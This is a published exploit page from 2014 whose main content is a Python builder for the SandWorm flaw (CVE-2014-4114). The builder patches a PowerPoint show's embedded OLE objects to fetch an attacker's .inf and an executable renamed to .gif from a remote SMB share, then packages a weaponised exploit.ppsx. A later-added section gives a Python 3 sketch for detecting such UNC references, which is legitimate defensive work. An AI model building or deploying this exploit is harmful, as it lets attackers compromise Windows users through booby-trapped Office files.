Windows OLE Package Manager SandWorm Exploit
Source: @v1ad_o  Author: Ovtchinikov  Published: 2014-10-21
#!/usr/bin/env python
import os
import zipfile
import sys
  
'''
Full Exploit: http://www.exploit-db.com/sploits/35019.tar.gz
  
Very quick and ugly [SandWorm CVE-2014-4114] exploit builder
Exploit Title: CVE-2014-4114 SandWorm builder
Built to run on: Linux/MacOSX
Date: 17/10/2014
Exploit Author: Vlad Ovtchinikov (@v1ad_o)
Vendor Homepage: microsoft.com
Tested on: Win7Sp1 64 bit - Microsoft Office 2013 Plus
Demo: http://youtu.be/ljjEkhflpvM
CVE : CVE-2014-4114
NOTE:
expl.inf (md5 8313034e9ab391df83f6a4f242ec5f8d) + expl.zip (md5 4a39121a60cc79d211fc7f7cfe00b707)
should be located in the same  dir as the builder.
01:39 cve-2014-4114.py
19:35 expl.inf
15:37 expl.zip
  
e.g.  python cve-2014-4114.py 10.0.0.233 rdb xxx.exe
10.0.0.233 - ip
rdb - share
xxx.exe - dropper
'''
host=sys.argv[1]
share=sys.argv[2]
mal_file=sys.argv[3]
  
print "\nPoC exploit builder v0.1 for logical OLE flaw in packager.dll [CVE-2014-4114] by vlad@sensepost.com @v1ad_o\n"
print "Building ... \n "
  
# extract the original .ppsx PoC
mal_file= mal_file.replace(' ', '')[:-4].lower()
fh = open('expl.zip', 'rb')
z = zipfile.ZipFile(fh)
for name in z.namelist():
    outpath = "./tmp"
    z.extract(name, outpath)
fh.close()
  
os.mkdir('out')
os.chdir('tmp')
  
# oleObject1.bin mod for GIF
infile = open('ppt/embeddings/oleObject1.bin')
outfile = open('ppt/embeddings/1.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.gif':mal_file+'.gif'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.remove ('ppt/embeddings/oleObject1.bin')
os.rename ('ppt/embeddings/1.bin','ppt/embeddings/oleObject1.bin')
  
# oleObject2.bin mod for INF
infile = open('ppt/embeddings/oleObject2.bin')
outfile = open('ppt/embeddings/2.bin','w')
replacements = {'10.0.0.34':host,'public':share,'slide1.inf':mal_file+'.inf'}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
  
os.remove ('ppt/embeddings/oleObject2.bin')
os.rename ('ppt/embeddings/2.bin','ppt/embeddings/oleObject2.bin')
os.system("zip -q  -9 -r  ../out/exploit.ppsx * ")
os.chdir('..')
  
# oleObject2.bin mod for INF prep
infile = open('expl.inf')
outfile = open('out/'+mal_file+'.inf','w')
replacements = {'slide1':mal_file}
for line in infile:
    for src, target in replacements.iteritems():
        line = line.replace(src, target)
    outfile.write(line)
infile.close()
outfile.close()
os.system("rm -rf tmp")
  
print 'Copy the .inf .gif (renamed file.exe=>file.gif) to:\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.gif\n'
print '*\\\\'+host +'\\'+ share +'\\'+ mal_file+'.inf\n'
print 'Done - collect your files from the [out] folder.\n'
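
The builder above only rewrites the host, share and file name stored in ppt/embeddings/oleObject1.bin and oleObject2.bin, so a mail or file gateway can flag OOXML files whose embedded objects reference a UNC path. The following detection sketch is an added example, not part of the original script. It is Python 3; scan_ooxml, build_sample and the 192.0.2.10 sample are constructed for illustration, and the scan assumes the path is stored as ASCII, as the builder's byte-level replacement implies.

```python
import io
import ntpath
import re
import zipfile

# \\host\share\...\file as ASCII bytes (assumption: stored as ASCII, which is
# what the byte-for-byte string replacement in the builder implies).
UNC_RE = re.compile(rb'\\\\[\w.-]+(?:\\[\w.$ -]+){2,}')
HIGH_RISK_EXT = {'.inf', '.exe'}          # the two file types the page names
MAX_MEMBER = 16 * 1024 * 1024             # do not inflate oversized members


def scan_ooxml(data):
    """Return [(part, unc_path, high_risk)] for embedded objects pointing at a UNC path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename.lower()
            if '/embeddings/' not in name or not name.endswith('.bin'):
                continue
            if info.file_size > MAX_MEMBER:
                findings.append((info.filename, '<member too large to scan>', True))
                continue
            for m in UNC_RE.finditer(z.read(info)):
                path = m.group().decode('ascii')
                ext = ntpath.splitext(path)[1].lower()
                findings.append((info.filename, path, ext in HIGH_RISK_EXT))
    return findings


def build_sample(remote_refs):
    """Constructed input: a zip laid out like a .ppsx with fake embedded-object bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w') as z:
        z.writestr('[Content_Types].xml', '<Types/>')
        for i, ref in enumerate(remote_refs, 1):
            z.writestr('ppt/embeddings/oleObject%d.bin' % i,
                       b'\x00\x01PAD' + ref.encode('ascii') + b'\x00PAD')
    return buf.getvalue()


if __name__ == '__main__':
    sample = build_sample([r'\\192.0.2.10\share\slide1.gif',
                           r'\\192.0.2.10\share\slide1.inf'])
    for part, path, high in scan_ooxml(sample):
        print('%-32s %-36s %s' % (part, path, 'HIGH' if high else 'review'))
```

Because the script tells the operator to rename the executable to .gif, the extension is only a hint: any UNC reference inside an embedded object deserves review, whatever the high_risk flag says.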